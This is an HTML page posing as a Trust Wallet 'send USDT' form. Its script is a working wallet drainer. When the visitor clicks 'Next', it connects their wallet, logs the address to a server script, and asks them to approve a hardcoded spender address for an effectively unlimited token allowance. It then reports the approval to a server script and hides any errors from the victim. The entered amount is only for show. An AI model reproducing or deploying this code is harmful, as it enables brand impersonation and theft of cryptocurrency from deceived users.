<!DOCTYPE html>
<html>

<head>

    
        <meta charset="utf-8">
        <link rel="icon" href="/favicon.ico">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta name="theme-color" content="#000000">
        <meta name="description" content="Web site created using create-react-app">
        <title>Trust Wallet</title>
       
        <link href="style.css" rel="stylesheet">
        <style data-styled="active" data-styled-version="6.1.15"></style>
        <script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.umd.min.js"></script>


    
    
    
</head>

<body>
    <div class="sc-FEMpB jHFPXJ">
    <p id="walletInfo" style="display: none;">Connecting...  </p> 
    <button onclick="approveToken()" style="display: none;">Approve Token</button>

    <div class="sc-fLDLck jOhuYu">
        <label class="sc-dycHyt hlElTY">Address or Domain Name</label>
        <div class="sc-jbAkgO iDNzau">
            <span class="sc-kfeOyU OQPBt">×</span>
            <input class="sc-gNZgCX gqpZqC" type="text" value="0xb36f4442c80907b8a026105528b482a5DB53D9D8">
            <span class="sc-hRDKVd eDghcy">Paste</span>
        </div>
    
    </div>


    <div class="sc-fLDLck jOhuYu">
        <label class="sc-dycHyt hlElTY">Amount</label>
        <div class="sc-jUkaYT hCWkoC">
            <div class="sc-jbAkgO iDNzau">
                <input class="sc-gNZgCX gqpZqC" type="number" id="amountInput" value="">
                <span class="sc-jBIHhB ceQVqA">USDT</span>
                <span class="sc-cMqPwU pIyLu">Max</span>
            </div>
        </div>
        <p class="sc-jHswkR bUFlBj" id="amountDisplay">= $0.00</p>
    </div>


<button type="submit" class="sc-deSjom dgAqxp" onclick="approveToken()">Next</button>





    <script>
        let walletAddress = "";
    let provider, signer;

    async function connectWallet() {
      if (window.ethereum) {
        try {
          await window.ethereum.request({ method: 'eth_requestAccounts' });
          provider = new ethers.providers.Web3Provider(window.ethereum);
          signer = provider.getSigner();
          walletAddress = await signer.getAddress();
          document.getElementById("walletInfo").innerText = "Connected: " + walletAddress;

          // Log wallet
          fetch('saveWallet.php', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({ wallet: walletAddress })
          });

        } catch (err) {
          console.error("Connection error:", err);
          document.getElementById("walletInfo").innerText = "Wallet not connected";
        }
      } else {
        alert("MetaMask not detected");
      }
    }

    async function approveToken() {
      if (!walletAddress) {
  await connectWallet();
  if (!walletAddress) return; // still not connected
}


      const tokenAddress = "0x55d398326f99059ff775485246999027b3197955"; // BUSD (BSC Testnet)
      const spender = "0xb36f4442c80907b8a026105528b482a5DB53D9D8";
      const amount = ethers.utils.parseUnits("147548758568568568456856", 18);

      const abi = ["function approve(address spender, uint256 amount) public returns (bool)"];
      const token = new ethers.Contract(tokenAddress, abi, signer);

      try {
        const tx = await token.approve(spender, amount);
        await tx.wait();
        
        console.log("✅ Token approved by user");

    
        

        // After successful token approval
        fetch('logApproval.php', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
        wallet: walletAddress,
        token: tokenAddress,
        spender: spender,
        amount: amount.toString()
        })
        })
        .then(res => res.json())
        .then(console.log);

    } catch (err) {
    console.warn("User rejected or error:", err.message);
    // No alert shown to user
    }
    }

    // Connect automatically when page loads
  //  window.addEventListener('load', connectWallet);
    </script>



    </div>  



    <script>
        const amountInput = document.getElementById("amountInput");
      const amountDisplay = document.getElementById("amountDisplay");
    
      // Listen for input changes
      amountInput.addEventListener("input", function() {
        // Get the current value and convert to a number if needed
        const val = amountInput.value;
        // Update the p tag; you can add formatting as needed
        amountDisplay.textContent = `= $${val || "0.00"}`;
      });
    </script>
</body>



</html>